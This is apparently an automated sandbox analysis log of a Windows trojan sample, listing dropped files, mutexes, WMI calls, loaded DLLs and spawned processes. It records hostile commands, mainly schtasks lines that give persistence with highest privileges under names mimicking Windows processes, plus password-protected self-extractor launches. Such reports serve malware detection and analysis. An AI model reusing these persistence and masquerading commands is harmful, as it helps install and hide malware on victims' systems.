                          Source: t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython39.dll. vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000000.00000003.1655768186.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exeBinary or memory string: OriginalFilename vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000001.00000003.1664258544.0000023EBC6EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000001.00000003.1664219894.0000023EBC6ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000001.00000002.1666043288.0000023EBC6F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000001.00000002.1668568609.00007FFDFBAA0000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython39.dll. vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs t8F7Ic986c.exe
                          Source: Chaindriver.exe.7.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Memory Compression.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: RuntimeBroker.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: NOFqHeDosUIopsPGLT.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: NOFqHeDosUIopsPGLT.exe0.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: classification engineClassification label: mal100.spre.troj.expl.evad.winEXE@63/47@1/1
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652ED8770 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF652ED8770
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03785A4 FindResourceExW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,4_2_00007FF6C03785A4
                          Source: C:\Chaindriver.exeFile created: C:\Users\user\Desktop\viEjRGTv.logJump to behavior
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7696:120:WilError_03
                          Source: C:\Recovery\Memory Compression.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-hfvbr7qWOm1XHEAbKVKA
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1740:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75042Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\1.bat" "
                          Source: t8F7Ic986c.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Chaindriver.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeFile read: C:\Windows\win.iniJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: t8F7Ic986c.exeReversingLabs: Detection: 47%
                          Source: t8F7Ic986c.exeVirustotal: Detection: 61%
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeFile read: C:\Users\user\Desktop\t8F7Ic986c.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\t8F7Ic986c.exe "C:\Users\user\Desktop\t8F7Ic986c.exe"
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeProcess created: C:\Users\user\Desktop\t8F7Ic986c.exe "C:\Users\user\Desktop\t8F7Ic986c.exe"
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\1.bat" "
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Chaindriver.sfx.exe Chaindriver.sfx.exe -p1234
                          Source: C:\Chaindriver.sfx.exeProcess created: C:\Chaindriver.exe "C:\Chaindriver.exe"
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 10 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 12 /tr "'C:\Recovery\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline"
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES953C.tmp" "c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP"
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 13 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLT" /sc ONLOGON /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "NOFqHeDosUIopsPGLTN" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Pictures\RuntimeBroker.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 5 /tr "'C:\Recovery\Memory Compression.exe'" /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Recovery\Memory Compression.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 8 /tr "'C:\Recovery\Memory Compression.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ChaindriverC" /sc MINUTE /mo 11 /tr "'C:\Chaindriver.exe'" /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Chaindriver" /sc ONLOGON /tr "'C:\Chaindriver.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ChaindriverC" /sc MINUTE /mo 11 /tr "'C:\Chaindriver.exe'" /rl HIGHEST /f
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: unknownProcess created: C:\Chaindriver.exe C:\Chaindriver.exe
                          Source: unknownProcess created: C:\Chaindriver.exe C:\Chaindriver.exe
                          Source: unknownProcess created: C:\Recovery\Memory Compression.exe "C:\Recovery\Memory Compression.exe"
                          Source: unknownProcess created: C:\Recovery\Memory Compression.exe "C:\Recovery\Memory Compression.exe"
                          Source: unknownProcess created: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                          Source: unknownProcess created: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Chaindriver.exe "C:\Chaindriver.exe"
                          Source: C:\Recovery\Memory Compression.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: unknownProcess created: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe "C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeProcess created: C:\Users\user\Desktop\t8F7Ic986c.exe "C:\Users\user\Desktop\t8F7Ic986c.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\1.bat" "Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Chaindriver.sfx.exe Chaindriver.sfx.exe -p1234Jump to behavior
                          Source: C:\Chaindriver.sfx.exeProcess created: C:\Chaindriver.exe "C:\Chaindriver.exe" Jump to behavior
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline"Jump to behavior
                          Source: C:\Chaindriver.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat" Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES953C.tmp" "c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Chaindriver.exe "C:\Chaindriver.exe"
                          Source: C:\Recovery\Memory Compression.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat"
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                          Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: dxgidebug.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: riched20.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: usp10.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: version.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: dxgidebug.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: dwmapi.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: riched20.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: usp10.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: msls31.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Chaindriver.sfx.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Chaindriver.exeSection loaded: apphelp.dllJump to behavior
